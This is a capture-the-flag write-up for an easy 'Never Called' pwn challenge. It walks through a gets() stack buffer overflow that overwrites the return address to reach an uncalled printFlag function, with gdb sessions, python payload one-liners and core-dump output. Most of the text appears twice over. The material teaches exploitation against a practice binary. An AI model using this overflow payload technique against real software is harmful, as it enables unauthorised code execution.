Never Called

PWN EASY - 362 points

PreviousApps NextStarting place

Last updated 1 year ago

Was this helpful?

Never Called

PWN EASY - 362 points

Description

I made a C program and in the program the method to get the flag is never called. How will you get it this time?

ASLR is off on the server.

https://storage.ebucket.dev/a.out

We have a server to connect to hosting the C program, we also get the source code in a .out format.

So, the program asks for input and prints the input back, the program ends and closes.

I'm going to check Ghidra to get more info.

I have found a function that seems to be printing the flag. The flag doesn't exist on the local version of the code, but it does on the provided IP address.

However the issue is that the actual function is never called by anything, so we cannot really get the flag, or can we?

There is also a function called getMessage:

this seems to be the function that loads when we start the program. We can notice the "gets" function, which should be an instant buffer overflow alarm. At this point I'm assuming we are gonna overflow the gets function into the printFlag address.

So now we need to learn the address where we want to overflow, I am going to use the gdb tool. I start the tool with ./a.out

$ gdb ./a.out            
GNU gdb (Debian 13.1-2) 13.1
...SNIP...
Reading symbols from ./a.out...
(gdb):

I am going to start by setting a breakpoint in the main function, then run the program and try to print the printFlag function location.

(gdb) p printFlag
$1 = {void ()} 0x565562ab <printFlag>

So the address is 0x565562ab, lets quit the gdb and try to overflow the program.

Alright, so we could've notice before that the variable loaded by gets has a buffer of 54. So lets try to print the letter b 54x times:

python3 -c "print('b'*54)" | ./a.out                 
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
zsh: done                              python3 -c "print('b'*54)" | 
zsh: segmentation fault (core dumped)  ./a.out

and looking at the core file to see which address i ended on.

$ gdb -q -c core -ex quit             
[New LWP 12745]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x56577202 in ?? ()

So, I don't see the letter b in hex yet but we get a segmetation fault, so we did overflow, lets try to send even more letters to see if we start modifying the buffer.

python3 -c "print('b'*65)" | ./a.out

Cool, we ended on the address 0x00626262, and since 62 in hex is the letter b, we know that we are overflowing the buffer and inputting stuff into it.

Now we need to enter the address of printFlag into the buffer, so we find a sweet spot with the letter b, where were just before the point of changing the buffer, so we can put the printFlag address after it, and because 'b'*65 has put "62" 3 times into the buffer, we should hit the spot if we input only 62 b's.

So now we can put the address in hex after our prepared b's. One way to do this in python would be to add the \x before every hex number.

python -c "print('b'*62 +'\x56\x55\x62\xab')" | ./a.out

now we overflowed the whole buffer, only thing is the hex appears to be flipped, because it actually gets written in it from the right, so lets flip our hex sequence.

python -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out

┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                
[New LWP 12836]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x5562abc2 in ?? ()

hmm, for some reason the hex c2 appears for some reason. Actually it is because this version of python has some issues with sending hex, so we just use python2 instead.

┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb�bUV
zsh: done                              python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | 
zsh: segmentation fault (core dumped)  ./a.out
                                                                                                                                         
┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                 
[New LWP 12852]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x565562ab in ?? ()

And just like that we get the address of printFlag! Now we just switch out ./a.out with nc <ip.address> <port> and we get the bucket flag!

PreviousApps NextStarting place

Last updated 1 year ago

Was this helpful?

Description

I made a C program and in the program the method to get the flag is never called. How will you get it this time?

ASLR is off on the server.

https://storage.ebucket.dev/a.out

We have a server to connect to hosting the C program, we also get the source code in a .out format.

So, the program asks for input and prints the input back, the program ends and closes.

I'm going to check Ghidra to get more info.

I have found a function that seems to be printing the flag. The flag doesn't exist on the local version of the code, but it does on the provided IP address.

However the issue is that the actual function is never called by anything, so we cannot really get the flag, or can we?

There is also a function called getMessage:

So now we need to learn the address where we want to overflow, I am going to use the gdb tool. I start the tool with ./a.out

$ gdb ./a.out            
GNU gdb (Debian 13.1-2) 13.1
...SNIP...
Reading symbols from ./a.out...
(gdb):

I am going to start by setting a breakpoint in the main function, then run the program and try to print the printFlag function location.

(gdb) p printFlag
$1 = {void ()} 0x565562ab <printFlag>

So the address is 0x565562ab, lets quit the gdb and try to overflow the program.

Alright, so we could've notice before that the variable loaded by gets has a buffer of 54. So lets try to print the letter b 54x times:

python3 -c "print('b'*54)" | ./a.out                 
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
zsh: done                              python3 -c "print('b'*54)" | 
zsh: segmentation fault (core dumped)  ./a.out

and looking at the core file to see which address i ended on.

$ gdb -q -c core -ex quit             
[New LWP 12745]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x56577202 in ?? ()

So, I don't see the letter b in hex yet but we get a segmetation fault, so we did overflow, lets try to send even more letters to see if we start modifying the buffer.

python3 -c "print('b'*65)" | ./a.out

Cool, we ended on the address 0x00626262, and since 62 in hex is the letter b, we know that we are overflowing the buffer and inputting stuff into it.

So now we can put the address in hex after our prepared b's. One way to do this in python would be to add the \x before every hex number.

python -c "print('b'*62 +'\x56\x55\x62\xab')" | ./a.out

now we overflowed the whole buffer, only thing is the hex appears to be flipped, because it actually gets written in it from the right, so lets flip our hex sequence.

python -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out

┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                
[New LWP 12836]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x5562abc2 in ?? ()

hmm, for some reason the hex c2 appears for some reason. Actually it is because this version of python has some issues with sending hex, so we just use python2 instead.

┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | ./a.out
Starting program
Enter your name: Hello, bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb�bUV
zsh: done                              python2 -c "print('b'*62 +'\xab\x62\x55\x56')" | 
zsh: segmentation fault (core dumped)  ./a.out
                                                                                                                                         
┌──(kali㉿kali)-[~/Desktop/nevercalled]
└─$ gdb -q -c core -ex quit                                 
[New LWP 12852]
Core was generated by `./a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x565562ab in ?? ()

And just like that we get the address of printFlag! Now we just switch out ./a.out with nc <ip.address> <port> and we get the bucket flag!